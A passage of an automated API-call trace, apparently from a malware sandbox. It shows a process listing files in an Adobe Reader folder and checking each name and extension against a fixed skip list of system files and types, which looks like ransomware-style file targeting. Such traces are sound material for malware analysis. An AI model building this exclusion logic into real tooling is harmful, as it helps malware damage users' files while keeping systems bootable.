CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG", cchCount1=14, lpString2="SENDMAIL.TUR", cchCount2=12) returned 1 [0058.590] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG1", cchCount1=15, lpString2="SENDMAIL.TUR", cchCount2=12) returned 1 [0058.590] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG2", cchCount1=15, lpString2="SENDMAIL.TUR", cchCount2=12) returned 1 [0058.590] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICONCACHE.DB", cchCount1=12, lpString2="SENDMAIL.TUR", cchCount2=12) returned 1 [0058.590] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="THUMBS.DB", cchCount1=9, lpString2="SENDMAIL.TUR", cchCount2=12) returned 3 [0058.590] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTSECT.BAK", cchCount1=12, lpString2="SENDMAIL.TUR", cchCount2=12) returned 1 [0058.590] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTMGR", cchCount1=7, lpString2="SENDMAIL.TUR", cchCount2=12) returned 1 [0058.590] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEFAULT.RDP", cchCount1=11, lpString2="SENDMAIL.TUR", cchCount2=12) returned 1 [0058.590] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PAGEFILE.SYS", cchCount1=12, lpString2="SENDMAIL.TUR", cchCount2=12) returned 1 [0058.590] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HIBERFIL.SYS", cchCount1=12, lpString2="SENDMAIL.TUR", cchCount2=12) returned 1 [0058.590] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SWAPFILE.SYS", cchCount1=12, lpString2="SENDMAIL.TUR", cchCount2=12) returned 3 [0058.590] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WORDPAD.EXE", cchCount1=11, lpString2="SENDMAIL.TUR", cchCount2=12) returned 3 [0058.590] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81f4af00, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81f971c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81f971c0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Services", cAlternateFileName="")) returned 1 [0058.590] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\tr_TR\\Services\\*.*", lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81f4af00, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81f971c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81f971c0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa40 [0058.591] FindNextFileW (in: hFindFile=0x69aa40, lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81f4af00, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81f971c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81f971c0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.591] FindNextFileW (in: hFindFile=0x69aa40, lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81f971c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x9270, dwReserved0=0x0, dwReserved1=0x0, cFileName="DEXShare.asfx", cAlternateFileName="DEXSHA~1.ASF")) returned 1 [0058.591] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BG85", cchCount1=4, lpString2="ASFX", cchCount2=4) returned 3 [0058.591] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="ASFX", cchCount2=4) returned 3 [0058.591] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="ASFX", cchCount2=4) returned 3 [0058.591] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BMP", cchCount1=3, lpString2="ASFX", cchCount2=4) returned 3 [0058.591] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="ASFX", cchCount2=4) returned 3 [0058.591] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RDP", cchCount1=3, lpString2="ASFX", cchCount2=4) returned 3 [0058.591] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="ASFX", cchCount2=4) returned 3 [0058.591] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="ASFX", cchCount2=4) returned 3 [0058.591] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="ASFX", cchCount2=4) returned 3 [0058.592] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BLF", cchCount1=3, lpString2="ASFX", cchCount2=4) returned 3 [0058.592] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RBS", cchCount1=3, lpString2="ASFX", cchCount2=4) returned 3 [0058.592] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REGTRANS-MS", cchCount1=11, lpString2="ASFX", cchCount2=4) returned 3 [0058.592] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SETTINGCONTENT-MS", cchCount1=17, lpString2="ASFX", cchCount2=4) returned 3 [0058.592] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEARCH-MS", cchCount1=9, lpString2="ASFX", cchCount2=4) returned 3 [0058.592] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="ASFX", cchCount2=4) returned 3 [0058.592] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="ASFX", cchCount2=4) returned 3 [0058.592] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG1", cchCount1=4, lpString2="ASFX", cchCount2=4) returned 3 [0058.592] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG2", cchCount1=4, lpString2="ASFX", cchCount2=4) returned 3 [0058.592] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT", cchCount1=10, lpString2="DEXSHARE.ASFX", cchCount2=13) returned 3 [0058.592] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.POL", cchCount1=10, lpString2="DEXSHARE.ASFX", cchCount2=13) returned 3 [0058.592] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG", cchCount1=14, lpString2="DEXSHARE.ASFX", cchCount2=13) returned 3 [0058.592] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG1", cchCount1=15, lpString2="DEXSHARE.ASFX", cchCount2=13) returned 3 [0058.592] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG2", cchCount1=15, lpString2="DEXSHARE.ASFX", cchCount2=13) returned 3 [0058.592] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICONCACHE.DB", cchCount1=12, lpString2="DEXSHARE.ASFX", cchCount2=13) returned 3 [0058.592] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="THUMBS.DB", cchCount1=9, lpString2="DEXSHARE.ASFX", cchCount2=13) returned 3 [0058.592] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTSECT.BAK", cchCount1=12, lpString2="DEXSHARE.ASFX", cchCount2=13) returned 1 [0058.592] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTMGR", cchCount1=7, lpString2="DEXSHARE.ASFX", cchCount2=13) returned 1 [0058.592] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEFAULT.RDP", cchCount1=11, lpString2="DEXSHARE.ASFX", cchCount2=13) returned 1 [0058.592] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PAGEFILE.SYS", cchCount1=12, lpString2="DEXSHARE.ASFX", cchCount2=13) returned 3 [0058.592] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HIBERFIL.SYS", cchCount1=12, lpString2="DEXSHARE.ASFX", cchCount2=13) returned 3 [0058.592] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SWAPFILE.SYS", cchCount1=12, lpString2="DEXSHARE.ASFX", cchCount2=13) returned 3 [0058.592] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WORDPAD.EXE", cchCount1=11, lpString2="DEXSHARE.ASFX", cchCount2=13) returned 3 [0058.592] FindNextFileW (in: hFindFile=0x69aa40, lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81f4af00, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xe5, dwReserved0=0x0, dwReserved1=0x0, cFileName="Services.asfx", cAlternateFileName="SERVIC~1.ASF")) returned 1 [0058.592] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BG85", cchCount1=4, lpString2="ASFX", cchCount2=4) returned 3 [0058.592] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="ASFX", cchCount2=4) returned 3 [0058.592] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="ASFX", cchCount2=4) returned 3 [0058.592] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BMP", cchCount1=3, lpString2="ASFX", cchCount2=4) returned 3 [0058.592] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="ASFX", cchCount2=4) returned 3 [0058.592] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RDP", cchCount1=3, lpString2="ASFX", cchCount2=4) returned 3 [0058.592] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="ASFX", cchCount2=4) returned 3 [0058.593] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="ASFX", cchCount2=4) returned 3 [0058.593] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="ASFX", cchCount2=4) returned 3 [0058.593] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BLF", cchCount1=3, lpString2="ASFX", cchCount2=4) returned 3 [0058.593] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RBS", cchCount1=3, lpString2="ASFX", cchCount2=4) returned 3 [0058.593] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REGTRANS-MS", cchCount1=11, lpString2="ASFX", cchCount2=4) returned 3 [0058.593] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SETTINGCONTENT-MS", cchCount1=17, lpString2="ASFX", cchCount2=4) returned 3 [0058.593] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEARCH-MS", cchCount1=9, lpString2="ASFX", cchCount2=4) returned 3 [0058.593] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="ASFX", cchCount2=4) returned 3 [0058.593] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="ASFX", cchCount2=4) returned 3 [0058.593] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG1", cchCount1=4, lpString2="ASFX", cchCount2=4) returned 3 [0058.593] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG2", cchCount1=4, lpString2="ASFX", cchCount2=4) returned 3 [0058.593] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT", cchCount1=10, lpString2="SERVICES.ASFX", cchCount2=13) returned 1 [0058.593] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.POL", cchCount1=10, lpString2="SERVICES.ASFX", cchCount2=13) returned 1 [0058.593] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG", cchCount1=14, lpString2="SERVICES.ASFX", cchCount2=13) returned 1 [0058.593] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG1", cchCount1=15, lpString2="SERVICES.ASFX", cchCount2=13) returned 1 [0058.593] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG2", cchCount1=15, lpString2="SERVICES.ASFX", cchCount2=13) returned 1 [0058.593] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICONCACHE.DB", cchCount1=12, lpString2="SERVICES.ASFX", cchCount2=13) returned 1 [0058.593] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="THUMBS.DB", cchCount1=9, lpString2="SERVICES.ASFX", cchCount2=13) returned 3 [0058.593] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTSECT.BAK", cchCount1=12, lpString2="SERVICES.ASFX", cchCount2=13) returned 1 [0058.593] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTMGR", cchCount1=7, lpString2="SERVICES.ASFX", cchCount2=13) returned 1 [0058.593] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEFAULT.RDP", cchCount1=11, lpString2="SERVICES.ASFX", cchCount2=13) returned 1 [0058.593] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PAGEFILE.SYS", cchCount1=12, lpString2="SERVICES.ASFX", cchCount2=13) returned 1 [0058.593] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HIBERFIL.SYS", cchCount1=12, lpString2="SERVICES.ASFX", cchCount2=13) returned 1 [0058.593] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SWAPFILE.SYS", cchCount1=12, lpString2="SERVICES.ASFX", cchCount2=13) returned 3 [0058.593] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WORDPAD.EXE", cchCount1=11, lpString2="SERVICES.ASFX", cchCount2=13) returned 3 [0058.593] FindNextFileW (in: hFindFile=0x69aa40, lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81f4af00, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xe5, dwReserved0=0x0, dwReserved1=0x0, cFileName="Services.asfx", cAlternateFileName="SERVIC~1.ASF")) returned 0 [0058.593] FindClose (in: hFindFile=0x69aa40 | out: hFindFile=0x69aa40) returned 1 [0058.593] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7dfea540, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x2800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Spelling.TUR", cAlternateFileName="")) returned 1 [0058.594] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BG85", cchCount1=4, lpString2="TUR", cchCount2=3) returned 1 [0058.594] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="TUR", cchCount2=3) returned 3 [0058.594] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="TUR", cchCount2=3) returned 1 [0058.594] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BMP", cchCount1=3, lpString2="TUR", cchCount2=3) returned 1 [0058.594] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="TUR", cchCount2=3) returned 1 [0058.594] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RDP", cchCount1=3, lpString2="TUR", cchCount2=3) returned 1 [0058.594] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="TUR", cchCount2=3) returned 1 [0058.594] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="TUR", cchCount2=3) returned 1 [0058.594] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="TUR", cchCount2=3) returned 1 [0058.594] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BLF", cchCount1=3, lpString2="TUR", cchCount2=3) returned 1 [0058.594] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RBS", cchCount1=3, lpString2="TUR", cchCount2=3) returned 1 [0058.594] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REGTRANS-MS", cchCount1=11, lpString2="TUR", cchCount2=3) returned 1 [0058.594] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SETTINGCONTENT-MS", cchCount1=17, lpString2="TUR", cchCount2=3) returned 1 [0058.594] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEARCH-MS", cchCount1=9, lpString2="TUR", cchCount2=3) returned 1 [0058.594] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="TUR", cchCount2=3) returned 1 [0058.594] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="TUR", cchCount2=3) returned 3 [0058.594] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG1", cchCount1=4, lpString2="TUR", cchCount2=3) returned 1 [0058.594] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG2", cchCount1=4, lpString2="TUR", cchCount2=3) returned 1 [0058.594] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT", cchCount1=10, lpString2="SPELLING.TUR", cchCount2=12) returned 1 [0058.594] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.POL", cchCount1=10, lpString2="SPELLING.TUR", cchCount2=12) returned 1 [0058.594] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG", cchCount1=14, lpString2="SPELLING.TUR", cchCount2=12) returned 1 [0058.594] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG1", cchCount1=15, lpString2="SPELLING.TUR", cchCount2=12) returned 1 [0058.594] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG2", cchCount1=15, lpString2="SPELLING.TUR", cchCount2=12) returned 1 [0058.594] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICONCACHE.DB", cchCount1=12, lpString2="SPELLING.TUR", cchCount2=12) returned 1 [0058.594] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="THUMBS.DB", cchCount1=9, lpString2="SPELLING.TUR", cchCount2=12) returned 3 [0058.594] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTSECT.BAK", cchCount1=12, lpString2="SPELLING.TUR", cchCount2=12) returned 1 [0058.594] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTMGR", cchCount1=7, lpString2="SPELLING.TUR", cchCount2=12) returned 1 [0058.595] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEFAULT.RDP", cchCount1=11, lpString2="SPELLING.TUR", cchCount2=12) returned 1 [0058.595] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PAGEFILE.SYS", cchCount1=12, lpString2="SPELLING.TUR", cchCount2=12) returned 1 [0058.595] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HIBERFIL.SYS", cchCount1=12, lpString2="SPELLING.TUR", cchCount2=12) returned 1 [0058.595] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SWAPFILE.SYS", cchCount1=12, lpString2="SPELLING.TUR", cchCount2=12) returned 3 [0058.595] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WORDPAD.EXE", cchCount1=11, lpString2="SPELLING.TUR", cchCount2=12) returned 3 [0058.595] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7f50a880, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x2a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Updater.TUR", cAlternateFileName="")) returned 1 [0058.595] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BG85", cchCount1=4, lpString2="TUR", cchCount2=3) returned 1 [0058.595] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="TUR", cchCount2=3) returned 3 [0058.595] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="TUR", cchCount2=3) returned 1 [0058.595] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BMP", cchCount1=3, lpString2="TUR", cchCount2=3) returned 1 [0058.595] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="TUR", cchCount2=3) returned 1 [0058.595] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RDP", cchCount1=3, lpString2="TUR", cchCount2=3) returned 1 [0058.595] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="TUR", cchCount2=3) returned 1 [0058.595] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="TUR", cchCount2=3) returned 1 [0058.595] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="TUR", cchCount2=3) returned 1 [0058.595] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BLF", cchCount1=3, lpString2="TUR", cchCount2=3) returned 1 [0058.595] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RBS", cchCount1=3, lpString2="TUR", cchCount2=3) returned 1 [0058.595] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REGTRANS-MS", cchCount1=11, lpString2="TUR", cchCount2=3) returned 1 [0058.595] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SETTINGCONTENT-MS", cchCount1=17, lpString2="TUR", cchCount2=3) returned 1 [0058.595] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEARCH-MS", cchCount1=9, lpString2="TUR", cchCount2=3) returned 1 [0058.595] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="TUR", cchCount2=3) returned 1 [0058.595] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="TUR", cchCount2=3) returned 3 [0058.595] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG1", cchCount1=4, lpString2="TUR", cchCount2=3) returned 1 [0058.595] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG2", cchCount1=4, lpString2="TUR", cchCount2=3) returned 1 [0058.596] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT", cchCount1=10, lpString2="UPDATER.TUR", cchCount2=11) returned 1 [0058.596] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.POL", cchCount1=10, lpString2="UPDATER.TUR", cchCount2=11) returned 1 [0058.596] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG", cchCount1=14, lpString2="UPDATER.TUR", cchCount2=11) returned 1 [0058.596] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG1", cchCount1=15, lpString2="UPDATER.TUR", cchCount2=11) returned 1 [0058.596] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG2", cchCount1=15, lpString2="UPDATER.TUR", cchCount2=11) returned 1 [0058.596] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICONCACHE.DB", cchCount1=12, lpString2="UPDATER.TUR", cchCount2=11) returned 1 [0058.596] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="THUMBS.DB", cchCount1=9, lpString2="UPDATER.TUR", cchCount2=11) returned 1 [0058.596] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTSECT.BAK", cchCount1=12, lpString2="UPDATER.TUR", cchCount2=11) returned 1 [0058.596] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTMGR", cchCount1=7, lpString2="UPDATER.TUR", cchCount2=11) returned 1 [0058.596] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEFAULT.RDP", cchCount1=11, lpString2="UPDATER.TUR", cchCount2=11) returned 1 [0058.596] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PAGEFILE.SYS", cchCount1=12, lpString2="UPDATER.TUR", cchCount2=11) returned 1 [0058.596] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HIBERFIL.SYS", cchCount1=12, lpString2="UPDATER.TUR", cchCount2=11) returned 1 [0058.596] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SWAPFILE.SYS", cchCount1=12, lpString2="UPDATER.TUR", cchCount2=11) returned 1 [0058.596] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WORDPAD.EXE", cchCount1=11, lpString2="UPDATER.TUR", cchCount2=11) returned 3 [0058.596] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x830ff2a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x6c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Weblink.TUR", cAlternateFileName="")) returned 1 [0058.596] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BG85", cchCount1=4, lpString2="TUR", cchCount2=3) returned 1 [0058.596] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="TUR", cchCount2=3) returned 3 [0058.596] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="TUR", cchCount2=3) returned 1 [0058.596] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BMP", cchCount1=3, lpString2="TUR", cchCount2=3) returned 1 [0058.596] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="TUR", cchCount2=3) returned 1 [0058.596] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RDP", cchCount1=3, lpString2="TUR", cchCount2=3) returned 1 [0058.596] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="TUR", cchCount2=3) returned 1 [0058.596] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="TUR", cchCount2=3) returned 1 [0058.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="TUR", cchCount2=3) returned 1 [0058.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BLF", cchCount1=3, lpString2="TUR", cchCount2=3) 